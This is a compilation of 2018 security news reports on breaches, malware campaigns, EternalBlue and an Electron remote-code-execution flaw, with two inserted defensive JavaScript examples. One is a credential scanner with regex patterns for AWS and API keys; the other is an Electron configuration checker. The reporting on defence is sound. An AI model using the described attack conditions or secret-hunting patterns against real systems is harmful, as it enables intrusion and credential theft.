This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, Google.com, Facebook, Twitter, and a couple of other sites.

The third campaign aimed at financial institutions in Latin America, most of them in Argentina, Colombia, and Ecuador. Like the other attacks, the same campaign also targeted social media, search, email, entertainment, and tech providers.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.


Code Execution Flaw in Electron Framework Could Affect Many Apps
14.5.2018 securityweek  Vulnerability

GitHub’s open source development framework Electron is affected by a vulnerability that can allow remote code execution. Technical details and proof-of-concept (PoC) code were made public last week by the researcher who discovered the issue.

Electron allows developers to create cross-platform desktop applications using HTML, CSS and JavaScript. The framework has been used in the development of hundreds of applications, including Skype, GitHub Desktop, Slack, WhatsApp, Signal, Discord and WordPress.com.

Trustwave researcher Brendan Scarvell discovered earlier this year that certain applications created with Electron may allow remote code execution if they are affected by cross-site scripting (XSS) vulnerabilities and configured in a specific way.

“Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can do some nasty things such as require in the child_process module and execute system commands on the client-side,” the researcher explained in a blog post. “You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.”

Scarvell found that if an application is affected by an XSS flaw and certain options have not been manually set in the app’s webPreferences, an attacker can re-enable nodeIntegration during runtime and execute system commands.

The vulnerability, tracked as CVE-2018-1000136, was patched by Electron developers in March with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4. The security hole can also be mitigated by adding a piece of code provided by Electron.

The Signal messaging app and the Brave web browser are reportedly not impacted by this flaw.


Chili's Restaurants Hit by Payment Card Breach
14.5.2018 securityweek  Incident

People who recently paid with their credit or debit card at a Chili’s restaurant may have had their information stolen by cybercriminals, according to Dallas-based Brinker International.

Brinker, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries, issued a notice shortly after the data breach was discovered on May 11.

While the investigation is ongoing, initial evidence suggests that a piece of malware collected payment card data from some Chili’s restaurants in March and April 2018. The malware apparently harvested credit and debit card numbers as well as cardholder names from payment systems used for in-restaurant purchases.

Brinker noted that it does not collect social security numbers, dates of birth or other personal information.

“We immediately activated our response plan upon learning of this incident,” the company stated. “We are working with third-party forensic experts to conduct an investigation to determine the details of what happened.”

Brinker believes the incident has been contained, but advised customers to keep an eye on their bank and credit card statements for any suspicious activity. The company has set up a web page where it will provide updates on this incident.

Chili’s is not the only major restaurant chain to disclose a payment card breach this year. RMH Franchise Holdings revealed in March that malware had been found on point-of-sale (PoS) systems at over 160 Applebee’s restaurants it operates as a franchise.

Several major restaurant chains disclosed payment card breaches last year, including Arby’s, Chipotle, Sonic Drive-In, and Shoney’s. Amazon's Whole Foods Market also informed customers that taprooms and full table-service restaurants at nearly 100 locations were hit by a breach.


ZTE Woes Loom as US-China Trade Tensions Rise
13.5.2018 securityweek BigBrothers

With a major Chinese smartphone maker on the rocks following US sanctions, the trade spat between Washington and Beijing appears to be taking a turn for the worse for tech firms in the two global economic powerhouses.

Chinese telecom giant ZTE said in the past week its major operations had "ceased" following last month's US ban on American sales of critical technology to the company, raising the possibility of its collapse.

ZTE depended on American chips and other components, and is unable to continue operating without key supplies.

US officials imposed the ban last month, saying ZTE failed to abide by an agreement to stop selling to Iran and North Korea.

While the ZTE case has a specific legal basis, the ban comes as US-China trade relations have hit a rough patch, amid an intense rivalry for supremacy in key technology fields such as artificial intelligence and 5G, the next-generation wireless systems in the works.

The US administration has barred military and government employees from using smartphones from ZTE and fellow Chinese maker Huawei.

President Donald Trump earlier this year blocked a deal that would have allowed a Singapore-based firm to acquire US chipmaker Qualcomm, claiming it would enable Huawei to set the pace of the global rollout of 5G technology.

The trade troubles threaten a technology sector that is increasingly intertwined with major players in the United States and China.

"It's going to disrupt procurement, supply lines, it will affect a lot of companies in various ways," said one technology industry executive who asked to remain anonymous.

"Nobody's panicking yet but people are nervous and watching."

Accelerating independence drive

James Lewis, a technology specialist with the Center for Strategic and International Studies, said the tensions are likely to prompt China to step up efforts to disconnect from the US tech sector.

"The biggest impact will be to accelerate China's desire to have non-American sources of supply," Lewis said.

"They don't want to be held hostage" to US tech firms.

Lewis said the technology trade tensions stem from genuine concerns in Washington that critical 5G and related telecom technologies will be dominated by China-based Huawei.

"Huawei is trying to become the telecom company for the world," Lewis said. "They are the strongest across the board in 5G... This is a place where China's model of capital works better."

Lewis said that with companies like Huawei and ZTE facing obstacles in the United States, "American companies see the opening to the China market closing more rapidly than they might have thought."

In the near-term, Lewis said, Chinese firms still depend on some elements of US technology, but they are moving to become more autonomous.

Still, he said Washington has some justified national security concerns about preventing Huawei from becoming too dominant.

Increasing reliance on Chinese telecom equipment would give Beijing an edge in global surveillance and intelligence, he said.

"The equipment is always calling home," he said. "If you control the updater and the infrastructure you have an immense advantage."

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

A statement from Huawei said its products "meet the highest standards of security, privacy and engineering in every country we operate," adding that "no government has ever asked us to compromise the security or integrity of any of our networks or devices."

Victory dance?

Matt Gold, an adjunct Fordham University law professor and former deputy assistant US trade representative, said the latest problems over ZTE are unlikely to worsen relations because "the current situation is about as bad as it can get without a complete freefall."

Gold said that while the president has authority under domestic law to impose sanctions for national security reasons, such moves may violate international trade rules and laws if the actions come in the absence of war or other emergency.

In the current climate, Gold said, US lawmakers appear inclined to impose stricter limits on Chinese investments in US tech firms as a way to stay ahead of China.

The Trump administration, according to Gold, could take a risky hard-line path of imposing new tariffs and restrictions on technology, but is more likely to seek to negotiate some concessions.

He said it is probable that "after many months of negotiations, China will give the US a series of concessions, including some things they had already agreed to and some of which were promises they had given before."

And all that, Gold said, "will be face saving for President Trump, who will declare a great victory."


Nigelthorn Malware Infects Over 100,000 Systems
13.5.2018 securityweek  Virus

A newly discovered malware family capable of credential theft, cryptomining, click fraud, and other nefarious actions has already infected over 100,000 computers, Radware reveals.

Dubbed Nigelthorn because it abuses a Google Chrome extension called Nigelify, the malware is propagating via socially-engineered links on Facebook. The group behind the campaign has been active since at least March 2018 and has already managed to infect users in 100 countries.

Victims are redirected to a fake YouTube page that asks them to install a Chrome extension to play the video. Once they accept the installation, the malicious extension is added to their browser, and the machine is enrolled in the botnet.

Impacting both Windows and Linux machines, the malware depends on Chrome, which suggests that those who do not use this browser are not at risk, the security researchers point out.

The actor behind the campaign uses the Bitly URL shortening service when redirecting victims to Facebook to trick users into revealing their login credentials. Based on statistics from Bitly and the Chrome web store, Radware determined that 75% of the infections occurred in the Philippines, Venezuela and Ecuador, with the remaining 25% distributed over 97 other countries.

In order to bypass Google’s validation checks, the malware developers created copies of legitimate extensions and injected a short, obfuscated malicious script into them, to start the malware operation.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” the security researchers note.

When the extension is installed, a malicious JavaScript is executed to download the initial malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware itself is focused on stealing Facebook login credentials and Instagram cookies. It also redirects users to a Facebook API to generate an access token that is then sent to the C&C.

The stolen credentials are used for propagation, to spread the malicious link to the user’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts. Should any of the victim’s contacts click on the link, the infection process is repeated.

The malware also downloads a cryptomining tool to the victim’s machine. A publicly available browser-mining tool is used for this, downloaded from external sites that the group controls. Over the past several days, the actor was observed attempting to mine Monero, Bytecoin and Electroneum, all of which require CPU power to mine.

Persistence is achieved through closing the extensions tab if the user attempts to access it, and through downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

A YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” the researchers conclude.


Wannacry outbreak anniversary: the EternalBlue exploit even more popular now
13.5.2018 securityaffairs  Ransomware  Exploit

WannaCry ransomware outbreak anniversary – According to researchers from ESET, the popularity of EternalBlue has increased significantly over the past months.
Exactly one year ago, on May 12, the WannaCry ransomware infected hundreds of thousands of computers worldwide.

The malware owed its success to the EternalBlue exploit, which the Shadow Brokers stole from the arsenal of the US National Security Agency along with a large cache of tools and exploits.

The group released a 117.9 MB encrypted dump containing documents that suggest the NSA hacked SWIFT systems in the Middle East.

Some of the codenames for the hacking tools in the dump are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.

The tools work against almost all versions of Windows, from Windows 2000 and XP to Windows 7 and 8, and Server 2000, 2003, 2008, 2008 R2 and 2012, except Windows 10 and Windows Server 2016.

In March 2017, a month before EternalBlue was released by Shadow Brokers, Microsoft released the MS17-010 security bulletin containing patches for SMB exploits including EternalBlue.

Just after ETERNALBLUE was leaked online, security experts started observing a significant increase in the number of malware and hacking tools leveraging the NSA exploit to implement a self-spreading mechanism. Investigations into WannaCry revealed that at least three other groups had been leveraging the NSA EternalBlue exploit.

A few weeks prior to the Wannacry ransomware outbreak, EternalBlue was used by the Adylkuzz botnet for mining activities and by the UIWIX ransomware family.

EternalBlue targets a vulnerability in Windows’ Server Message Block (SMB) service on port 445; it only works against older operating system versions, mainly Windows XP and Windows 7.

EternalBlue was later used by other malware, including NotPetya and Bad Rabbit.

According to researchers from ESET, the popularity of EternalBlue has increased significantly over the past months.

“And as ESET’s telemetry data shows, its popularity has been growing over the past few months and a recent spike even surpassed the greatest peaks from 2017.” reads the analysis published by ESET.

“EternalBlue had a calmer period immediately after the 2017 WannaCryptor campaign: over the following months, attempts to use the EternalBlue exploit dropped to “only” hundreds of detections daily. Since September last year, however, the use of the exploit has slowly started to gain pace again, continually growing and reaching new heights in mid-April 2018.”

EternalBlue 2017-May2018-2

Experts noticed a significant increase in the use of EternalBlue since September 2017, reaching a peak in mid-April 2018; they believe that a Satan ransomware campaign observed in April contributed to the rapid spike.

“This exploit and all the attacks it has enabled so far highlight the importance of timely patching as well as the need for a reliable and multi-layered security solution that can block the underlying malicious tool,” continues ESET.

To mitigate the threat, disable SMBv1 and do not expose SMBv2 to the internet. Unfortunately, millions of devices with SMBv1 are currently still exposed online, most of them in the UAE, US, Russia, Taiwan, and Japan.

☠️ Nate Warfield 💀
@dk_effect
Almost a year after WannaCry and there's still over a million SMB servers without auth exposed to the world. At least it looks like "only" 66k of them are running Windows 🤦‍♂️🤦‍♂️

4:49 PM - May 11, 2018


iVideon Russia-based video surveillance solution leaked data, hundreds of thousands of records exposed
13.5.2018 securityaffairs  Incident

Security researchers from Kromtech Security discovered a MongoDB installation belonging to the Russia-based video surveillance firm iVideon left open online.
The database included personal information for over 825,000 subscribers and partners.

Leaked records include logins, email addresses, password hashes, server names, domain names, IP addresses, sub accounts, software settings, and payment settings information (we did not see any credit card data) for both individual subscribers and partners.

iVideon is a multi-platform solution that allows subscribers to aggregate, access, view over the Internet, and record locally or to iVideon’s secure cloud storage, nearly any Internet capable CCTV camera, DVR system, baby monitor, web cam, nanny cam, or even phone, computer, and tablet cameras.

Below are the tables included in the MongoDB archive:

servers.info: 12533 records
ivideon.servers: 810871 records
ivideon.partners: 132 records
ivideon.users: 825388 records

The experts reported their discovery to the firm, which promptly took the archive down.

According to iVideon, the server was used for load testing of its authentication APIs in February 2016; the testing policy was revised in 2017 so that such security issues will not happen again.

The Russian firm added that the passwords in the archive were stored as hashes produced with the Bcrypt algorithm, which is considered secure.

“The DB was populated with accounts & devices of several hundreds of Ivideon users marked for participation in beta-testing (Ivideon employees & external early adopters, mostly from Russia), copied multiple times to simulate some growth scenarios.” states the reply from iVideon shared by Kromtech Security.

“User info only included email, IP address and password hashes produced by a strong Bcrypt algorithm. No information related to payments, usage stats or means of getting access to user’s private data was present in the compromised DB. Partner data seen in the DB was real, containing only partner companies’ names and UI settings for their apps.”

The company was also the victim of an attack in which hackers tried to blackmail it; unfortunately, the attackers left no information in the logs. The crooks demanded a 0.2 bitcoin ransom, and the wallet they used had received two payments, probably made by other victims of the gang.

iVideon believes the exposed data does not pose a threat to its users or partners, and has downplayed the incident.

Kromtech Security applauded the company for its rapid response to the incident.

“We also definitely agree that one should not pay ransom in cases such as this, we’ve seen that it’s nothing but a scam. Their ability to quickly ascertain that only some of the deleted data was real and that aggregate traffic statistics on a router prove to them that it was not stolen will come as a relief to those who had real data in that database.” concluded Kromtech Security.

“Those users should also be pleased to know that they solved this issue in 2017 so that the data we found this year won’t be found again.”

Kromtech experts confirmed that the data included in the archive appeared to be legitimate.

The researchers also noted that this compromise took place after they had discovered and reported the database to iVideon, but before the company took it down.


UK mobile operator EE left a critical code system exposed with a default password
13.5.2018 securityaffairs
Vulnerability

EE, the largest mobile network in the UK with some 30 million customers, left a critical code system exposed online behind a default password.
EE, a British mobile network giant owned by BT Group, has been accused of leaving a critical code repository on an open-source tool protected only by a default username and password.

The disconcerting discovery was made by a security researcher who uses the Twitter handle “six”; he found two million lines of code, including the company's private employee and developer APIs and Amazon Web Services secret keys.

“One of the largest mobile networks in Britain, EE, which is also owned by BT Group, was accused of risking the safety of a critical code repository due to bad security. Apparently, the company left the repository protected only by a default login info, according to one researcher.” reported the koddos.net website.

six (@lol_its_six), 10 May 2018:
“After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1”

six (@lol_its_six), 10 May 2018:
“Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w”

With the source code and keys in hand, an attacker could analyse the code of the employee and payment systems to find vulnerabilities, or simply use the exposed AWS and API keys directly.

According to the researcher, payment information, including credit card data, is at risk.

six (@lol_its_six), 10 May 2018:
“You trust these guys with your credit card details, while they do not care about security, or customer privacy. Picture below shows access keys to authorize to their employee tool, for customer lookups. pic.twitter.com/clG4wsFcAM”

The code was exposed on a SonarQube instance, an open-source code-analysis platform, hosted on an EE subdomain and used by the operator to find bugs and security vulnerabilities in its website code.
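The keys the researcher describes were sitting in source that had been uploaded to a shared analysis server. As an added example (not EE's code and not the researcher's tooling), the following scanner flags AWS and generic API credentials in source before it is pushed anywhere shared. The sample file and its values are constructed for the example (the two AWS values are the placeholder credentials from AWS's own documentation), and the entropy threshold and rule set are assumed tuning choices.

```javascript
// Added example: minimal secret scanner for source files.
// Not EE's code; sample input and thresholds are constructed for this example.

const SECRET_PATTERNS = [
  // AWS access key IDs: 20 chars, AKIA (long-lived) or ASIA (temporary) prefix.
  { name: 'aws-access-key-id', re: /\b(AKIA|ASIA)[0-9A-Z]{16}\b/g, group: 0 },
  // A 40-char base64-like value assigned to something named like an AWS secret key.
  { name: 'aws-secret-access-key',
    re: /aws[_-]?secret[_-]?access[_-]?key\s*[:=]\s*['"]?([A-Za-z0-9/+=]{40})['"]?/gi, group: 1 },
  // Generic api_key / auth_token / secret assignments with a reasonably long value.
  { name: 'generic-api-key',
    re: /\b(api[_-]?key|auth[_-]?token|secret)\s*[:=]\s*['"]([A-Za-z0-9_\-]{16,})['"]/gi, group: 2 },
];

// Assumed threshold (bits per character): filters obvious placeholders such as AKIAXXXXXXXXXXXXXXXX.
const MIN_ENTROPY = 3.0;

// Shannon entropy of a string, in bits per character.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Keep only the first and last four characters so a report does not leak the secret itself.
function redact(value) {
  return value.length <= 8 ? '****' : value.slice(0, 4) + '...' + value.slice(-4);
}

// Scan one file's text; returns {file, line, rule, preview} per high-entropy match.
function scanSource(text, filename = '<input>') {
  const findings = [];
  text.split('\n').forEach((line, idx) => {
    for (const { name, re, group } of SECRET_PATTERNS) {
      re.lastIndex = 0; // reset the /g regex between lines
      let m;
      while ((m = re.exec(line)) !== null) {
        const value = m[group];
        if (shannonEntropy(value) < MIN_ENTROPY) continue; // placeholder, not a credential
        findings.push({ file: filename, line: idx + 1, rule: name, preview: redact(value) });
      }
    }
  });
  return findings;
}

// Constructed sample; every value below is a documented fake, not a live credential.
const SAMPLE_SOURCE = [
  '// config.js (constructed sample; every value below is a documented fake)',
  'const AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE";',
  'const aws_secret_access_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY";',
  "const api_key = 'sk_live_4eC39HqLyjWDarjtT1zdp7dc';",
  'const placeholder = "AKIAXXXXXXXXXXXXXXXX"; // low entropy, should be skipped',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanSource(SAMPLE_SOURCE, 'config.js')) {
    console.log(`${f.file}:${f.line} ${f.rule} ${f.preview}`);
  }
}
```

Run against a checkout before pushing to the analysis server; anything it reports should be moved to a secrets store and the key rotated, since a key that has been committed once must be treated as leaked.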

According to the researcher, he notified EE of the exposure several times over a period of weeks, but the company never replied.

“After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over two million lines of private source code to their systems and employee systems, due to using an ‘admin:admin’ user/pass combination,” six tweeted.


A company spokesman, speaking to ZDNet, disputed the researcher's claims and downplayed the incident, maintaining that no customer or payment data was at risk.

According to the spokesperson, the exposed material is development code that contains no information about the production infrastructure.

The company said it had since changed the password and taken the service offline.

“Our final code then goes through further checks, processes, and review from our security team before being published,” the spokesperson said. “This development code does not contain any information pertaining to our production infrastructure or production API credentials as these are maintained in separate secure systems and details are changed by a separate team.”

“We take the security of our customer data extremely seriously and would like to thank the researcher for bringing this issue to our attention. We’re conducting a thorough investigation to make sure this does not happen again,” the spokesperson told ZDNet.


Malicious package containing Bytecoin cryptocurrency miner found on the Ubuntu Snap Store
13.5.2018 securityaffairs
Virus Cryptocurrency

An Ubuntu user has spotted a Bytecoin cryptocurrency miner hidden in an Ubuntu snap package hosted on the official Ubuntu Snap Store.
An Ubuntu user who goes by the GitHub moniker “Tarwirdur” discovered malware in an Ubuntu snap package hosted on the official Ubuntu Snap Store; a first analysis revealed it to be a cryptocurrency miner.

The malicious code mined the Bytecoin (BCN) cryptocurrency; the account hardcoded in the miner is “myfirstferrari@protonmail.com.”

The malicious app, 2048buntu, is a copycat of the legitimate 2048 game distributed as an Ubuntu snap.


Tarwirdur found that the app contained a cryptocurrency miner disguised as the “systemd” daemon; the package also includes an init script that gives the miner persistence across reboots on the target.

Tarwirdur reported his discovery to the Ubuntu Snap Store team, which promptly removed the app. He also noticed another app uploaded by the same developer and, after checking it, found that it contained malicious code too, so it was removed as well.

“At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, “pending further investigations“.” states a post published on the website linuxuprising.com.

It is currently impossible to establish how many users were affected, because the Ubuntu Snap Store does not publish install counts.

The underlying problem is that submitted snaps do not go through a security review, which means a malicious actor can upload malware to the Ubuntu Snap Store.


A new flaw in Electron poses a risk to apps based on the framework
13.5.2018 securityaffairs
Vulnerability

Security experts have discovered a vulnerability in the Electron software framework that has been used for building a large number of popular desktop applications.
Popular desktop applications, including Skype, Slack, GitHub Desktop, Twitch, WordPress.com, and others, are potentially affected.

Electron is an open-source framework built on Node.js, V8 and Chromium that lets developers build desktop apps with web technologies such as JavaScript, HTML and CSS.

When building apps on Electron, developers can use the Electron APIs or the Node.js APIs and built-in modules.

The Node.js APIs and built-in modules give developers deeper integration with the operating system and access to more OS features.

To limit what web content can reach, the Electron team provides a setting that controls whether renderer content gets access to Node.js at all.

“Electron applications are essentially web apps, which means they’re susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js’ built in modules.” reads the analysis published by Trustwave. “This makes XSS particularly dangerous, as an attacker’s payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side.”

Developers can deny web content access to the Node.js APIs and modules by setting “nodeIntegration: false” in a window's webPreferences; as the Trustwave analysis notes, a default application does not do this, so the setting has to be applied deliberately.

The WebView tag lets developers embed content such as web pages inside an Electron application and run it in a separate process.

“When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default.” continues the analysis.

Declaring webviewTag: false in webPreferences disables the tag, so no WebView can be created with nodeIntegration turned on; if developers leave webviewTag undeclared, Electron only infers its value from the nodeIntegration setting, and that inferred setting is what the attack gets around.

Trustwave researcher Brendan Scarvell discovered that it is possible to flip the nodeIntegration option to “true”, giving malicious content access to the Node.js APIs and modules and therefore to the underlying OS.

Scarvell explained that if the developers of an Electron-based app have not explicitly set “webviewTag: false” in webPreferences, an attacker can exploit a cross-site scripting (XSS) flaw in the app to open a new window containing a WebView whose settings set the nodeIntegration flag to “true.”

The expert published proof-of-concept code that an attacker could use, given any XSS flaw, to gain access to the underlying OS.

“If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3), and hasn’t manually opted into one of the following:

Declared webviewTag: false in its webPreferences.
Enabled the nativeWindowOption option in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.” continues the analysis.

Scarvell reported the vulnerability to the Electron team, which addressed it in March.
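To make the advisory's conditions checkable, here is an added example in plain JavaScript; it is not Trustwave's proof of concept and not Electron project code. It encodes the fixed versions quoted above, classifies a window's webPreferences against the three opt-outs (the option the quote calls “nativeWindowOption” is nativeWindowOpen in Electron's webPreferences), and shows the shape of a will-attach-webview handler, the hook Electron's main process exposes for vetting WebView creation before it happens. The ALLOWED_ORIGIN value, the function names and the rule that release lines older than 1.7 count as unfixed are assumptions of the example.

```javascript
// Added example: checking an Electron app against the webview/nodeIntegration
// bypass described above. Not Trustwave's PoC, not Electron project code.

const FIXED_VERSIONS = ['1.7.13', '1.8.4', '2.0.0-beta.3']; // from the advisory text

// Parse "2.0.0-beta.3" into numeric core parts and pre-release identifiers.
function parseVersion(v) {
  const [core, pre = ''] = v.split('-');
  const nums = core.split('.').map(Number);
  const ids = pre ? pre.split('.').map((x) => (/^\d+$/.test(x) ? Number(x) : x)) : [];
  return { nums, pre: ids };
}

// Semver-style ordering: a release outranks its own pre-releases, and numeric
// pre-release identifiers sort before alphanumeric ones.
function compareVersions(a, b) {
  const A = parseVersion(a);
  const B = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (A.nums[i] !== B.nums[i]) return A.nums[i] < B.nums[i] ? -1 : 1;
  }
  if (A.pre.length === 0 || B.pre.length === 0) {
    if (A.pre.length === B.pre.length) return 0;
    return A.pre.length === 0 ? 1 : -1;
  }
  for (let i = 0; i < Math.max(A.pre.length, B.pre.length); i++) {
    const x = A.pre[i];
    const y = B.pre[i];
    if (x === undefined) return -1;
    if (y === undefined) return 1;
    if (x === y) continue;
    if (typeof x === 'number' && typeof y === 'number') return x < y ? -1 : 1;
    if (typeof x === 'number') return -1;
    if (typeof y === 'number') return 1;
    return x < y ? -1 : 1;
  }
  return 0;
}

// True when this Electron release already carries the March fix.
// Assumption: release lines older than 1.7 never received a fix and count as
// unfixed; anything above 2.0.0-beta.3 counts as fixed.
function electronVersionIsFixed(version) {
  const v = parseVersion(version);
  const fix = FIXED_VERSIONS.find((f) => {
    const p = parseVersion(f);
    return p.nums[0] === v.nums[0] && p.nums[1] === v.nums[1];
  });
  if (fix) return compareVersions(version, fix) >= 0;
  return compareVersions(version, '2.0.0-beta.3') > 0;
}

// Classify a BrowserWindow's webPreferences against the advisory's opt-outs.
// `handlesNewWindow` is true when the app intercepts new-window events and
// sets event.newGuest itself without using the supplied options.
// An undefined nodeIntegration is treated as on (the default at the time).
function assessWindow(webPreferences, electronVersion, handlesNewWindow = false) {
  if (webPreferences.nodeIntegration !== false) return 'node-integration-on'; // XSS is already RCE
  if (electronVersionIsFixed(electronVersion)) return 'patched';
  if (webPreferences.webviewTag === false) return 'mitigated:webviewTag';
  if (webPreferences.nativeWindowOpen === true) return 'mitigated:nativeWindowOpen';
  if (handlesNewWindow) return 'mitigated:new-window-handler';
  return 'vulnerable';
}

// Hardened defaults: no Node in the renderer, no <webview>, isolated preload world.
function hardenWebPreferences(prefs) {
  return { ...prefs, nodeIntegration: false, webviewTag: false, contextIsolation: true };
}

// Handler for webContents 'will-attach-webview' (event, webPreferences, params):
// strip preload scripts, force nodeIntegration off, refuse foreign origins.
const ALLOWED_ORIGIN = 'https://app.example.com'; // assumed value for this example
function stripWebviewPrivileges(event, webPreferences, params) {
  delete webPreferences.preload;
  delete webPreferences.preloadURL;
  webPreferences.nodeIntegration = false;
  let origin = null;
  try { origin = new URL(params.src).origin; } catch (_) { /* unparsable src: refuse */ }
  if (origin !== ALLOWED_ORIGIN) event.preventDefault();
}

// Inside an Electron main process the handler is wired up like this;
// skipped when the file runs under plain Node.
if (process.versions.electron) {
  const { app } = require('electron');
  app.on('web-contents-created', (_e, contents) => {
    contents.on('will-attach-webview', stripWebviewPrivileges);
  });
}
```

The version check only tells you whether the specific bug is present; hardenWebPreferences and the will-attach-webview handler are the settings worth keeping regardless of version, because they remove the capability an XSS payload would need rather than the one path to it.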


One Year After WannaCry Outbreak, EternalBlue Exploit Still a Threat
12.5.2018 securityweek
Exploit

One year after the WannaCry ransomware outbreak, the NSA-linked exploit used for propagation is still threatening unpatched and unprotected systems, security researchers say.

The WannaCry infection started on May 12, 2017, disrupting Spanish businesses and dozens of hospitals in the U.K. The malware hit Windows 7 the most and was estimated to have infected nearly half a million computers and other types of devices within 10 days.

The largest number of machines was hit in the first hours of the outbreak, before a security researcher discovered a kill-switch and slowed the spreading to a near stop.

“WannaCry served as a cybersecurity wake-up call for many organizations that were falling behind in their routine IT responsibilities,” Ken Spinner, VP of Field Engineering, Varonis, told SecurityWeek in an emailed comment.

“While WannaCry tore through organizations like the NHS, companies that kept their systems updated with the latest patches, performed backups and took proactive security measures emerged unscathed,” Spinner continued.

WannaCry was able to spread fast because it abused an exploit supposedly stolen from the National Security Agency-linked Equation Group. Called EternalBlue, the exploit was made public in April 2017, one month after Microsoft released a patch for it.

EternalBlue targets a flaw in the SMBv1 implementation of Windows’ Server Message Block (SMB) service, reachable over port 445; the exploit was most reliable against older versions (mainly Windows XP and Windows 7), which is where the bulk of infections occurred.

Although it brought the exploit to the spotlight, WannaCry wasn’t the first malware to abuse it. During the weeks prior to the outbreak, EternalBlue was leveraged by a crypto-currency mining botnet and a backdoor. A ransomware family called UIWIX was also observed abusing it around the same period.

Despite Microsoft releasing a couple of patches for the security flaw targeted by EternalBlue, including an emergency patch for unsupported systems, tens of thousands of systems continued to be vulnerable last summer.

WannaCry, which was supposedly the work of North Korean actors, managed to wreak havoc a year ago, but it died fast. EternalBlue, on the other hand, remained strong, and was also abused in the global NotPetya attack last year.

In fact, security researchers say that the NSA-linked exploit is currently more popular among cybercriminals than it was a year ago.

Overall, more than 2 million users were observed being hit via the exploit from May 2017 to May 2018, Moscow-based security firm Kaspersky Lab told SecurityWeek.

The number of unique users hit by EternalBlue was 10 times higher in April 2018 compared to May 2017, with an average of more than 240,000 users being attacked via this exploit every month, the security firm also said.

“The fact that hackers keep targeting users using the EternalBlue exploit in their attacks means that many systems remain unpatched, which could lead to some dangerous consequences. It’s still highly important for organizations to take a close look at the security of their networks. Their first priority should be to install all necessary patches on time, in order to avoid losses in the future,” said Anton Ivanov, lead malware analyst, Kaspersky Lab.

According to ESET, not only did the popularity of EternalBlue increase significantly over the past months, but a “recent spike even surpassed the greatest peaks from 2017.”

Following a calmer period after the WannaCry attack, when only hundreds of detections were observed daily, the use of EternalBlue started picking up pace in September last year and reached new heights in mid-April 2018.

A Satan ransomware campaign observed last month likely contributed to the latest spike, but the exploit might have been used in other malicious activities as well, the researchers say.

“This exploit and all the attacks it has enabled so far highlight the importance of timely patching as well as the need for a reliable and multi-layered security solution that can block the underlying malicious tool,” ESET points out.

The main reason EternalBlue’s usage is spiking is the existence of millions of vulnerable devices that continue to be exposed to the Internet, as Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, told SecurityWeek.

“Immediately after the WannaCry epidemic last year, most security researchers advised people to disable SMBv1 entirely and make sure SMBv2 was not exposed to the internet. One year later and we are still seeing about 2.3M devices with SMBv1 exposed to the internet, with the majority of these vulnerable machines in the UAE, US, Russia, Taiwan and Japan,” Hahad said.

"The same mitigation techniques that have been recommended over and over again are still relevant and effective to minimize the impacts of a ransomware attack, but it comes down to actually implementing them,” Hahad continued.


Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
12.5.2018 securityaffairs
Attack

Security experts devised a new attack technique, dubbed Throwhammer, that could be exploited by attackers to launch a Rowhammer attack against a system on the same LAN.
A few days ago we discussed the GLitch attack, which leverages graphics processing units (GPUs) to launch a remote Rowhammer attack against Android smartphones.

